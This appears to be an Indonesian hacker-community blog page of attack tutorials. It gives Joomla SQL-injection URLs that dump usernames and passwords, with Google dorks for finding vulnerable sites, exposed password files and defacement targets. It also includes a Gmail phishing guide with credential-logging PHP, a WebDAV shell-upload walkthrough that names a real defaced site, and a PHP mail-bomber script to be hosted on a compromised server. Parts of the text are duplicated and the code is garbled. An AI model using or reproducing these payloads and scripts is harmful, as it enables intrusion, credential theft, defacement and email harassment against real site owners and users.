Indonesian Hacker Team | Artikel
The Best Indonesian Community
Senin, 04 November 2013
Exploite n Bugs Joomla
Jomla Live chat
Dork:
Code:
allinurl:option=com_livechat
Exploit :
Code:
administrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_users
administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users
Joomla "option=com_juser"
info http://milw0rm.com/exploits/8847
Dork:
Code:
inurl:option=com_juser
exploit:
Code:
index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
Joomla "com_jvideo"
info dari http://milw0rm.com/exploits/8821
Dork :
Code:
inurl:option=com_jvideo
inurl:com_jvideo
exploit:
Code:
index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users
Joomla "option=com_juser"
info http://milw0rm.com/exploits/8847
Dork:
Code:
inurl:option=com_juser
exploit:
Code:
index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
Joomla com_ewriting
Joomla com_simple_review Sql injection
Dork:
Code:
inurl:"com_simple_review"
Exploit:
Code:
index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--
Joomla Qur'an component
DORK :
Code:
inurl:"/index.php?option=com_quran"
atau
allinurl:"com_quran"
Exploit :
Mambo
Code:
index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--
Joomla
Code:
index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--
Joomla Component com_cinema SQL Injection
DORK
Code:
allinurl: "com_cinema"
EXPLOiT 1 :
Code:
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*
EXPLOiT 2 :
Code:
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/*
Joomla Component joomradio Remote SQL Injection
DORK:
Code:
inurl:com_joomradio
Exploit :
Code:
index.php?option=com_joomradio&page=show_video&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--
Memanfaatkan Dork Sebagai Senjata Hacking
Pengenalan tentang google dorks :
Type-type dalam penggunaannya ada beberapa macam diantaranya:
intitle
allintitle
(Mencari judul/title pada suatu web)
inurl
allinurl
(Mencari suatu string yang terdapat pada url)
filetype
(Mencari suatu file secara lebih spesifik)
(www.google.c.id/help/faq_filetypes.html)
allintext
(Mencari suatu nilai string dalam suatu web)
site
(Mencari pada web tertentu)
link
(Mencari web2 yang mempunyai link pada web yang di pilih)
contoh dalam pengguunaannya:
Apabila kita ingin mencair sebuah lagu dari aveng*d maka kita ketikan sja di google seperti ini
intitle:"index of/avenged"
dan apa hasilnya, akan kelihatan semua kumpulan lagu2 tsb, dan dengan mudah untuk kita mendownloadnya.
Pengertian diatas, mksdnya biasanya dalam sebuah databse file web terdapat kata ( index of ) maka kita gunaka fungsi intitle untuk mencari sebuah title yang berkaitan dengan kata ( index of ), llu ketikan kata aveng*d agar google mencari database file tentg kata-kata aveng*d
Apabila kita ingin mencair sebuah skripsi maka kita ketikan sja di google seperti ini
intitle:"index of" "skripsi" site:.ac.id
mksudnya site:ac.id itu biasanya url untuk kampus berakhiran .ac.id
dan ini contoh2 lain dalam penggunaan google dork
inurl:"guest | book" "html allowed"
inurl:password.log
intitle:"index of" password.txt site:my
intitle:"index of" admin.mdb
intitle:"index of" member.mdb
intitle:"phpmyadmin" "running on localhost"
intitle:"index of" "data base" site:id
inurl:database.inc site:id
inurl:connector.txt site:id
site:id filetype:.doc
sehingga kita bisa menggunakan google ini untk senjata hacking kita:
misalkan kita ingin mencoba untuk menembus pada web dari j**mla dengan menggunakan token (').
biasanya url ketika memasukan token tsb adlah
*******.com/index.php?option=com_user&view=reset&layout=confir m
di url tsb terdapat tulsan option=com_user
mka dgn sedikit logika, kita coba menggunakan type ( inurl ) u/ mencari url yg berkaitan dengan kata option=com_user
ketikan di google >>>>> inurl:"option=com_user"
dan akan terlihat hasilnya, kita ambil contoh pada web indonesia saja,
http://www.lbifib.ui.ac.id/index.php...ser&view=login
lalu hapus pada url (/index.php?option=com_user&view=login) dan ganti url tersebut menjadi
http://www.lbifib.ui.ac.id/index.php...layout=confirm
lalu ketikan token '
dan apa hasilnya, password sudah bisa kita reset ulang,,,,
sekarang tinggal bagaimana kita meng-applikasikan kata tersebut agar bisa mencari celah pada suatu URL website.
Dork Email
filetype:txt @yahoo.com password:*
filetype:txt @ymail.com password:***
filetype:txt @yahoo.com password:***
filetype:txt @gmail.com password:*
filetype:txt @gmail.com password:*
filetype:txt email + password:* @gmail.com @yahoo.com
Dork Rapidshare
Expiration-date:*2010 +login: rapidshare.com
Note : Date nya tinggal ganti sesuka kita, mau di ubah ke 2011- 2012- 2013. Etc
Dork Fake Login
Untuk mencari email beserta Password hasil phishing bisa jga menggunakan google Dork
search z di google dengan dork ini ^-^
DORK ->
intext:"Date Submitted" intext:"password" intext:"email" inurl:"logs.txt"
Dork Untuk Defacing (The Best Dork)
Sebagian Dork untuk Aksi Deface
inurl:"id=" & intext:"Warning: preg_match() " site:.il
inurl:"id=" & intext:"Warning: ilesize() " site:.co.il
inurl:"id=" & intext:"Warning: filesize() " site:.co.il
inurl:"id=" & intext:"Warning: require() " site:.co.il
inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il
inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il
inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il
inurl:"id=" & intext:"Warning: mysql_fetch_array() " site:.au
inurl:"id=" & intext:"Warning: mysql_num_rows() " site:.co.il
inurl:"id=" & intext:"Warning: session_start() " site:.il
inurl:"id=" & intext:"Warning: getimagesize() " site:.co.il
inurl:"id=" & intext:"Warning: is_writable() " site:.ca
inurl:"id=" & intext:"Warning: getimagesize() " site:.co.il
inurl:"id=" & intext:"Warning: Unknown() " site:.il
inurl:"id=" & intext:"Warning: session_start() " site:.il
inurl:"id=" & intext:"Warning: mysql_result() " site:.il
inurl:"id=" & intext:"Warning: pg_exec() " site:.il
inurl:"id=" & intext:"Warning: mysql_result() " site:.il
inurl:"id=" & intext:"Warning: mysql_num_rows() " site:.il
inurl:"id=" & intext:"Warning: mysql_query() " site:.il
inurl:"id=" & intext:"Warning: array_merge() " site:.co.il
Sekarang tinggal copy salah satu Dork diatas, di google.com/.co.id Etc & liat hasilnya ^_^
Sekian dulu smoga bermanfaat ^_^
Minggu, 03 November 2013
Phishing Tutorial
misi ane numpang share cara phising yang biasa ane kerjain semoga bermanfaat buat semua,.....
cuma ini yang ane bisa ,....
ane share buat kita sama2 belajar abg2
kasih cendol klo berguna ,..dan klo gak berguna di closed aja bang
langsung saja kita ke TKP
cekidot :
Phishing Tutorial
Phishing adalah proses mencuri informasi sensitif, seperti
username, password, dan informasi bank, dengan berpura-pura menjadi seseorang
Anda tidak. Contoh ini akan jika Anda menerima dan e-mail dari seorang hacker
berpura-pura menjadi bank Anda. Dalam e-mail, ia dapat memberitahu Anda bahwa Anda perlu untuk
memperbarui account Anda sebelum kadaluarsa, dan kemudian hacker menyediakan Icon_charly_link_green. Setelah
Anda klik pada Icon_charly_link_green, Anda tiba di sebuah website yang terlihat persis seperti Anda yang sebenarnya
bank halaman. Pada kenyataannya itu hanya replika yang sempurna, dan ketika anda masukan login
rincian, itu mengirimnya ke email hacker atau toko di server web nya. Hacker yang
menciptakan yang terbaik, paling menipu halaman web phishing yang berpengetahuan di
daerah HTML dan pemrograman PHP. Di bawah ini saya akan menunjukkan contoh sederhana
beberapa langkah-langkah hacker yang dibutuhkan untuk membuat situs web phishing. Dengan melihat
langkah hacker akan ambil, akan membantu Anda mempertahankan diri dari serangan itu.
1. Pertama hacker memilih target. Yang paling populer target phishing
serangan layanan e-mail seperti Hotmail dan Gmail karena mereka
yang paling umum dan sekali hacker mendapatkan akses ke e-mail Anda, dia juga
mendapat akses ke memuat informasi pengguna lainnya untuk semua situs-situs lain
Anda gunakan. Dalam contoh ini kita akan berpura-pura hacker memilih Gmail sebagai nya
target.
2. Setelah memilih targetnya, hacker akan pergi ke situs web dan menyimpan
Seluruh halaman utama. Saya menggunakan Mozilla Firefox, (sangat merekomendasikan menggunakan
browser untuk keamanan dan kustomisasi) Jadi saya akan pergi ke.
http://www.gmail.com dan klik File -> halaman Simpan sebagai ..., atau cukup tekan <CTR> + S
yang melakukan ini secara otomatis. Pilih mana Anda ingin menyimpan
halaman web dan tekan Simpan.
3. Setelah Anda memilikinya disimpan, mengubah nama ServiceLogin.htm untuk index.htm. The
alasan Anda ingin nama "index" begitu ketika Anda meng-upload ke web
host dan seseorang pergi ke Icon_charly_link_green, halaman indeks adalah halaman pertama yang
muncul.
4. Selanjutnya hacker akan membuat script PHP untuk melakukan perbuatan kotor nya
menguatkan informasi Anda. Di bawah ini adalah script PHP sederhana yang log dan
menyimpan informasi login Anda ketika Anda klik "Sign in". Untuk melihat cara kerjanya,
copy dan paste kode berikut ke notepad. Selanjutnya simpan ke dalam
direktori yang sama seperti Anda menyimpan halaman Gmail, dan nama itu phish.php. Dalam
Selain ke halaman phish.php, membuat file teks baru kosong dan beri nama
list.txt.
PHP Code:
<?php // This marks the beginning of the PHP script.
PHP Code:
Header(“Location:
https://www.google.com/accounts/Serv...=mail&passive=
true&rm=false&continue=http%3A%2F%2Fmail.google.co m%2Fmail%2F
%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=defa ult<mplcac
he=2 “); // once you click “Sign in†in the fake website, this redirects
you to the real Gmail website, making the whole process look more
legit.
PHP Code:
$handle = fopen(“list.txtâ€, “aâ€); // this tells the server to open the file
“list.txt†and get it ready for appending data. Which in this case is your
username and password.
PHP Code:
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=â€);
fwrite($handle, $value);
fwrite($handle, “\r\nâ€);
} // This section simply assigns all the information going through
this form to a variable. This includes your username and password.
Fwrite($handle, “\r\nâ€); // This writes your details to the file “list.txtâ€
fclose($handle); // This simply closes the connection to the file
“list.txtâ€
exit;
> /? / Marks akhir program PHP.
Sejauh ini anda akan melihat berikut di folder anda:
5. Sekarang hacker harus mengedit halaman Gmail utama untuk menyertakan nya
PHP script. Untuk melihat apa yang akan dilakukan hacker, membuka Gmail utama
halaman yang bernama index.htm dengan notepad.
6. Tekan <CTR> + F, atau pergi ke Edit -> Find, ketik aksi dan tekan "Find Next".
7. Ini akan menyorot terjadinya pertama dari "tindakan" kata di script
dan Anda harus melihat:
bentuk
PHP Code:
<id = "gaia_loginform" action = "https: / / www.google.com/accounts/Serv...?service=mail"
Ada dua "tindakan" kejadian di script jadi pastikan Anda memiliki
yang benar dengan melihat "bentuk id" nama di atas. Ubah Icon_charly_link_green yang
antara action = "" untuk phish.php. Ini akan membuat bentuk tunduk kepada
Anda phish script PHP, bukan ke Google. Setelah Icon_charly_link_green Anda akan melihat
kode:
metode = "post"
Ubah kata "POST" untuk "GET" sehingga terlihat seperti metode = "GET".
Apa yang dilakukan adalah metode GET menyampaikan informasi yang Anda ketik
melalui URL sehingga script PHP dapat log itu.
8. Simpan dan tutup file tersebut.
9. Selanjutnya hacker akan meng-upload file hingga hosting yang gratis yang
mendukung PHP. Dengan pencarian Google sederhana Anda bisa datang dengan
banyak yang termasuk dalam kategori ini.
10. Setelah semua file di-upload, Anda harus memberikan izin tertulis kepada
"List.txt" file. Setiap perusahaan hosting harus memiliki pilihan CHMOD berikutnya
ke setiap file. Pilih opsi ini dan mengubah izin file untuk
"List.txt" ke 777. Jika Anda tidak bisa mengetahui bagaimana melakukan ini, mintalah orang-orang yang
menggunakan host yang sama atau hanya sesuatu yang mirip dengan Google:
"Yourwebhostname chmod".
11. Setelah semuanya dan siap untuk pergi, pergi ke host anda disediakan Icon_charly_link_green
Anda untuk website Anda dan Anda akan melihat replika halaman Gmail. Ketik
username / password dan klik Daftar masuk ini seharusnya diarahkan Anda
ke halaman Gmail nyata.
12. Sekarang pergi melihat file list.txt Anda dengan pergi melalui file hosting Anda
manajer atau akan
http://www.yourwebhosturl.com/youraccount/list.txt. Meskipun ini
yang paling umum web host yang anda gunakan dapat memberikan yang berbeda
mencari URL. Sekarang jika saya menaruh nama pengguna dari "myusername" dan password
dari "mypassword" kemudian "list.txt" sekarang akan tampak seperti berikut:
PHP Code:
ltmpl = default
ltmplcache = 2
terus = http://mail.google.com/mail/?
service = mail
rm-palsu
Email = username
Passwd = mypassword
rmShown = 1
signin = Masuk
AST =
Seperti yang Anda lihat jika Anda jatuh hacker ini akan memiliki email Anda dan
sandi. Scary, eh? hehehehe
semoga bermanfaat abg2 jika ada kekurangan mohon dimaklumin masih newbie
Jumat, 01 November 2013
Cara Deface Index Website dengan Webdav For Newbie
Peralatan:
- Tool Webdav Hmei7: [ Download ]
[Sumber]
step:
1. Buka tool webdav yang telah di download tadi, klik tab 'webdav' lalu pilih 'Asp shell maker'
2. Pada setting Name of Your Shell bisa diubah sesuka kamu sob, lalu klik add site lalu masukkan website target, disini saya menjadikan www.beijingcoal.com/ sebagai target
3. Lalu klik serang!! jika muncul tulisan 'shell created' berarti kita sukses menanam shell ke situs tersebut, namun jika yang muncul 'Not Vulnerable Dav' berarti sobat harus mencari target yang lain karena target sobat tidak vuln terhadap webdav
4. Sekarang kita check hasil shell yang telah tertanam tadi, perhatikan gambar pada step nomor 3 diatas, yang saya beri garis biru adalah letak shellnya, copy ke browser lalu buka link tersebut, contoh: http://www.beijingcoal.com/Hmei7.asp;.txt
5. Setelah masuk ke directory web tersebut silahkan cari file yang kemungkinan adalah index dari web tersebut
6. Stelah ketemu file yang berisi index lalu klik pada icon pensil disampingnya untuk mengedit, hapus semua scriptnya lalu tukar dengan script deface kalian sob, kemudian klik kaydet untuk menyimpan
7. Oke, script indexnya sudah saya ganti dengan script saya, dan sekarang saya akan mengakses http://www.beijingcoal.com/ untuk melihat hasilnya

oke, homepage / index website tersebut berhasil saya deface, jika sewaktu-waktu tampilan website tersebut telah kembali normal itu berarti adminnya telah memperbaiki website tersebut sob
[Sumber]
Tutorial Ini Sudah Di test 100% oleh Saya
Dan berhasil.. ini salah satu Website yg saya Deface..
Klik Disini
Visit My Portal www.dwisatria.com
Dan jangan lupa untuk bergabung di
http://defaceart.indonesianhacker.or.id
- Tool Webdav Hmei7: [ Download ]
[Sumber]
step:
1. Buka tool webdav yang telah di download tadi, klik tab 'webdav' lalu pilih 'Asp shell maker'
2. Pada setting Name of Your Shell bisa diubah sesuka kamu sob, lalu klik add site lalu masukkan website target, disini saya menjadikan www.beijingcoal.com/ sebagai target
3. Lalu klik serang!! jika muncul tulisan 'shell created' berarti kita sukses menanam shell ke situs tersebut, namun jika yang muncul 'Not Vulnerable Dav' berarti sobat harus mencari target yang lain karena target sobat tidak vuln terhadap webdav
4. Sekarang kita check hasil shell yang telah tertanam tadi, perhatikan gambar pada step nomor 3 diatas, yang saya beri garis biru adalah letak shellnya, copy ke browser lalu buka link tersebut, contoh: http://www.beijingcoal.com/Hmei7.asp;.txt
5. Setelah masuk ke directory web tersebut silahkan cari file yang kemungkinan adalah index dari web tersebut
6. Stelah ketemu file yang berisi index lalu klik pada icon pensil disampingnya untuk mengedit, hapus semua scriptnya lalu tukar dengan script deface kalian sob, kemudian klik kaydet untuk menyimpan
7. Oke, script indexnya sudah saya ganti dengan script saya, dan sekarang saya akan mengakses http://www.beijingcoal.com/ untuk melihat hasilnya

oke, homepage / index website tersebut berhasil saya deface, jika sewaktu-waktu tampilan website tersebut telah kembali normal itu berarti adminnya telah memperbaiki website tersebut sob
[Sumber]
Tutorial Ini Sudah Di test 100% oleh Saya
Dan berhasil.. ini salah satu Website yg saya Deface..
Klik Disini
Visit My Portal www.dwisatria.com
Dan jangan lupa untuk bergabung di
http://defaceart.indonesianhacker.or.id
Cara Membuat Email Boomber
Cara Membuat Mail Bomber
Selamat Siang rekan Hacker semua kali ini ane mau sharing nih gan tentang Cara membuat Mail BomberSudah pada tahu kan apa itu mail bomber. Gampangnya Mail Bomber itu yang membuat email lawan kita nanti jadi penuh, bukan yang bisa meledakkan email orang loh, mentang mentang namanya Mail Bomber hehehe.........
Silahkan agan download scriptnya
Download Script Mail Bomber 1
Download Script Mail Bomber 2
Semoga bermanfaat aganyang mau liat lebih banyak lagi tutorial nya bisa ke SINI
Code:
<?php /* LumajangCrew Bomber v0.1 Thanks to:ynafri and all of lumajangcrew member http://lumajangcr3w.freeforums.org */ if(isset($_POST[send])){ $to = $_POST['to']; $from = $_POST['from']; $name= $_POST['name']; $sub= $_POST['sub']; $mes=$_POST['message']; $header = "From: $name <$from>\n"; $header .= "Content-Type: text/plain; charset=iso-8859-1\n";
$jumlah=$_POST[jumlah];
FOR ($i=1;$i<=$jumlah;$i++)
{ mail($to, $sub, $mes, $header); } } ?> <head><title>LumajangCrew Bomber</title></head> <body bgcolor="black"> <font color ="#00ff00" face="verdana"><b> <center>LumajangCrew Bomber</center> <form method="post"> <br>Sender: <br><input type="text" name="from"> <br>Receiver: <br><input type="text" name="to"> <br>Jumlah: <br><input type="text" name="jumlah"> <br>Name: <br><input type="text" name="name"> <br>Subject: <br><input type="text" name="sub"> <br> <br><label for="username">Pesan</label> <br><tr><textarea name="message" cols="115" rows="10"></textarea></tr> <br><input type="submit" value="send" name="send" id="send"> <center> <br>Copyright @ xyberbreaker <br>2009 </center> </b></font></center> </body>
Keterangan: Sender: (isi dengan alamat email palsu, misal: tukang@nge.b.om)
Receiver: (isi dengan alamat email target)
Jumlah: (isi dengan jumlah email yang ingin dikirimkan, misal 10000)
Name: (isi dengan apa saja, misal: tukang ngebom
Subject: (isi dengan apa saja, misal: email bom
Pesan: (isi dengan pesan kita, misal: “tukang bom mode [on]”)
Cara penggunaan: 1.Simpan script diatas dengan ekstensi .php, misal: bomber.php 2.Upload di web kita, tapi lebih baik di shell hasil inject. 3.Pengeboman dimulai,hehehe.
Ok, sekian dulu ya tutorial aku kali ini. Mohon maaf jika ada kesalahan. Semoga bermanfaat.
Langganan:
Komentar (Atom)




